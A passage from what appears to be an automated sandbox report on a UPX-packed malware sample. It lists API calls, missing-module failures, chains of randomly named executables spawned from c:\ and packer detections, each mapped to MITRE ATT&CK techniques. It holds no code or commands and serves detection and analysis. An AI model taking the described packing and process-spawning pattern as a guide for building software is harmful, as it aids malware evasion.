\"jjxfht.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003224)\n \"jjxfht.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003224)\n \"jjxfht.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003224)\n \"jjxfht.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003224)\n \"fvnph.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004268)\n \"fvnph.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004268)\n \"fvnph.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004268)\n \"fvnph.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004268)\n \"42600.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000976)\n \"42600.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000976)\n \"42600.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000976)\n \"42600.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000976)\n \"40806.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004264)\n \"40806.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004264)\n \"40806.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004264)\n \"40806.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004264)\n \"62046.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000332)\n \"62046.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000332)\n \"62046.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000332)\n \"62046.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000332)\n \"pdhnvj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003460)\n \"pdhnvj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003460)\n \"pdhnvj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003460)\n \"pdhnvj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003460)\n \"tjxjxxh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004084)\n \"tjxjxxh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004084)\n \"tjxjxxh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004084)\n \"tjxjxxh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004084)\n \"rnftf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003804)\n \"rnftf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003804)\n \"rnftf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003804)\n \"rnftf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003804)\n \"rnftf.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003804)\n \"nvfdf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003180)\n \"nvfdf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003180)\n \"nvfdf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003180)\n \"nvfdf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003180)\n \"88806.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003176)\n \"88806.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003176)\n \"88806.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003176)\n \"88806.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003176)\n \"88806.exe\" called \"LoadLibrary\" with a parameter KERNEL32.DLL (UID: 00000000-00003176)\n \"88806.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00003176)\n \"88806.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00003176)\n \"88806.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003176)\n \"8446060.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003164)\n \"8446060.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003164)\n \"8446060.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003164)\n \"8446060.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003164)\n \"42442.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000132)\n \"42442.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000132)\n \"42442.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000132)\n \"42442.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000132)\n \"0802042.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000904)\n \"0802042.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000904)\n \"0802042.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000904)\n \"0802042.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000904)\n \"rttxj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001000)\n \"rttxj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001000)\n \"rttxj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001000)\n \"rttxj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001000)\n \"fdfnr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000396)\n \"fdfnr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000396)\n \"fdfnr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000396)\n \"fdfnr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000396)\n \"848066.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002528)\n \"848066.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002528)\n \"848066.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002528)\n \"848066.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002528)\n \"0024648.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002064)\n \"0024648.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002064)\n \"0024648.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002064)\n \"0024648.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002064)\n \"xxfflb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002520)\n \"xxfflb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002520)\n \"xxfflb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002520)\n \"xxfflb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002520)\n \"ptxnnrh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000728)\n \"ptxnnrh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000728)\n \"ptxnnrh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000728)\n \"ptxnnrh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000728)\n \"vvtbdn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002836)\n \"vvtbdn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002836)\n \"vvtbdn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002836)\n \"vvtbdn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002836)\n \"0288086.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003528)\n \"0288086.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003528)\n \"0288086.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003528)\n \"0288086.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003528)\n \"22004.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001624)\n \"22004.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001624)\n \"22004.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001624)\n \"22004.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001624)\n \"0086084.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002740)\n \"0086084.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002740)\n \"0086084.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002740)\n \"0086084.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002740)\n \"lrnlbrl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004028)\n \"lrnlbrl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004028)\n \"lrnlbrl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004028)\n \"lrnlbrl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004028)\n \"bvffnn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003912)\n \"bvffnn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003912)\n \"bvffnn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003912)\n \"bvffnn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003912)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"bbhhn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"bbhhn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xlbdxlx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xlbdxlx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"68282.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"68282.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"62242.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"62242.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rbldl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rbldl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"trdvh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"trdvh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dnppt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dnppt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"btvxfh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"btvxfh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8224062.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8224062.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"64660.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"64660.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xlfpx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xlfpx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"pfffth.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"pfffth.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jpdvr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jpdvr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"682244.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"682244.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"hppjr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"hppjr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jjxfht.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jjxfht.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fvnph.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fvnph.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"42600.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"42600.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"40806.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"40806.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"62046.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"62046.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"pdhnvj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"pdhnvj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"tjxjxxh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"tjxjxxh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rnftf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rnftf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nvfdf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nvfdf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"88806.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"88806.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8446060.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8446060.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"42442.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"42442.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"0802042.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0802042.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rttxj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rttxj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fdfnr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fdfnr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"848066.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"848066.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"0024648.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0024648.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xxfflb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xxfflb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ptxnnrh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ptxnnrh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"vvtbdn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"vvtbdn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"0288086.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0288086.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"22004.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"22004.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"0086084.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0086084.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"lrnlbrl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"lrnlbrl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"bvffnn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"bvffnn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"trdvh.exe\" called \"CreateProcessA\" with parameter \"c:\\vdfxt.exe\" - (UID: 00000000-00002612)\n \"vdfxt.exe\" called \"CreateProcessA\" with parameter \"c:\\dnppt.exe\" - (UID: 00000000-00006120)\n \"682244.exe\" called \"CreateProcessA\" with parameter \"c:\\6040442.exe\" - (UID: 00000000-00002824)\n \"0600220.exe\" called \"CreateProcessA\" with parameter \"c:\\2262446.exe\" - (UID: 00000000-00003448)\n \"rnftf.exe\" called \"CreateProcessA\" with parameter \"c:\\nvfdf.exe\" - (UID: 00000000-00003804)\n \"88806.exe\" called \"CreateProcessA\" with parameter \"c:\\8446060.exe\" - (UID: 00000000-00003176)\n \"848066.exe\" called \"CreateProcessA\" with parameter \"c:\\0024648.exe\" - (UID: 00000000-00002528)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"bbhhn.exe\" (UID: 00000000-00005876)\n Spawned process \"nrdvp.exe\" (UID: 00000000-00005988)\n Spawned process \"xlbdxlx.exe\" (UID: 00000000-00004308)\n Spawned process \"68282.exe\" (UID: 00000000-00006088)\n Spawned process \"62242.exe\" (UID: 00000000-00005996)\n Spawned process \"rbldl.exe\" (UID: 00000000-00004224)\n Spawned process \"jbdbn.exe\" (UID: 00000000-00006112)\n Spawned process \"trdvh.exe\" (UID: 00000000-00002612)\n Spawned process \"vdfxt.exe\" (UID: 00000000-00006120)\n Spawned process \"dnppt.exe\" (UID: 00000000-00004300)\n Spawned process \"btvxfh.exe\" (UID: 00000000-00005976)\n Spawned process \"8224062.exe\" (UID: 00000000-00005560)\n Spawned process \"64660.exe\" (UID: 00000000-00004376)\n Spawned process \"xlfpx.exe\" (UID: 00000000-00002960)\n Spawned process \"pfffth.exe\" (UID: 00000000-00002380)\n Spawned process \"vnjvhvr.exe\" (UID: 00000000-00001460)\n Spawned process \"jpdvr.exe\" (UID: 00000000-00002896)\n Spawned process \"jxtxdv.exe\" (UID: 00000000-00003668)\n Spawned process \"682244.exe\" (UID: 00000000-00002824)\n Spawned process \"6040442.exe\" (UID: 00000000-00002732)\n Spawned process \"0600220.exe\" (UID: 00000000-00003448)\n Spawned process \"2262446.exe\" (UID: 00000000-00003728)\n Spawned process \"266028.exe\" (UID: 00000000-00004404)\n Spawned process \"0600240.exe\" (UID: 00000000-00001256)\n Spawned process \"8064042.exe\" (UID: 00000000-00004408)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"bbhhn.exe\" (UID: 00000000-00005876)\n Spawned process \"nrdvp.exe\" (UID: 00000000-00005988)\n Spawned process \"xlbdxlx.exe\" (UID: 00000000-00004308)\n Spawned process \"68282.exe\" (UID: 00000000-00006088)\n Spawned process \"62242.exe\" (UID: 00000000-00005996)\n Spawned process \"rbldl.exe\" (UID: 00000000-00004224)\n Spawned process \"jbdbn.exe\" (UID: 00000000-00006112)\n Spawned process \"trdvh.exe\" (UID: 00000000-00002612)\n Spawned process \"vdfxt.exe\" (UID: 00000000-00006120)\n Spawned process \"dnppt.exe\" (UID: 00000000-00004300)\n Spawned process \"btvxfh.exe\" (UID: 00000000-00005976)\n Spawned process \"8224062.exe\" (UID: 00000000-00005560)\n Spawned process \"64660.exe\" (UID: 00000000-00004376)\n Spawned process \"xlfpx.exe\" (UID: 00000000-00002960)\n Spawned process \"pfffth.exe\" (UID: 00000000-00002380)\n Spawned process \"vnjvhvr.exe\" (UID: 00000000-00001460)\n Spawned process \"jpdvr.exe\" (UID: 00000000-00002896)\n Spawned process \"jxtxdv.exe\" (UID: 00000000-00003668)\n Spawned process \"682244.exe\" (UID: 00000000-00002824)\n Spawned process \"6040442.exe\" (UID: 00000000-00002732)\n Spawned process \"0600220.exe\" (UID: 00000000-00003448)\n Spawned process \"2262446.exe\" (UID: 00000000-00003728)\n Spawned process \"266028.exe\" (UID: 00000000-00004404)\n Spawned process \"0600240.exe\" (UID: 00000000-00001256)\n Spawned process \"8064042.exe\" (UID: 00000000-00004408)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e\" has an writable section named \"UPX0\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e\" has an writable section named \"UPX1\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e\" has an writable section named \"UPX2\"\n \"bphvxnd.exe\" has an writable section named \"UPX0\"\n \"bphvxnd.exe\" has an writable section named \"UPX1\"\n \"bphvxnd.exe\" has an writable section named \"UPX2\"\n \"ndjtrh.exe\" has an writable section named \"UPX0\"\n \"ndjtrh.exe\" has an writable section named \"UPX1\"\n \"ndjtrh.exe\" has an writable section named \"UPX2\"\n \"lhfrhnr.exe\" has an writable section named \"UPX0\"\n \"lhfrhnr.exe\" has an writable section named \"UPX1\"\n \"lhfrhnr.exe\" has an writable section named \"UPX2\"\n \"482064.exe\" has an writable section named \"UPX0\"\n \"482064.exe\" has an writable section named \"UPX1\"\n \"482064.exe\" has an writable section named \"UPX2\"\n \"202048.exe\" has an writable section named \"UPX0\"\n \"202048.exe\" has an writable section named \"UPX1\"\n \"202048.exe\" has an writable section named \"UPX2\"\n \"48866.exe\" has an writable section named \"UPX0\"\n \"48866.exe\" has an writable section named \"UPX1\"\n \"48866.exe\" has an writable section named \"UPX2\"\n \"hrffr.exe\" has an writable section named \"UPX0\"\n \"hrffr.exe\" has an writable section named \"UPX1\"\n \"hrffr.exe\" has an writable section named \"UPX2\"\n \"nfbjp.exe\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e\" was detected as \"UPX\" and name: \"Packer\"\n \"bphvxnd.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"ndjtrh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"lhfrhnr.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"482064.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"202048.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"48866.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"hrffr.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"nfbjp.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"6064442.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"44424.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"pdjrtdv.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"bvffnn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"fplrrnr.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"lrnlbrl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"0086084.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"22004.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4688248.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"0288086.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"vvtbdn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"dbhlfn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"ptxnnrh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"xxfflb.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"44680.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"0024648.exe\" was detected as \"UPX\" and name: \"Packer\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": 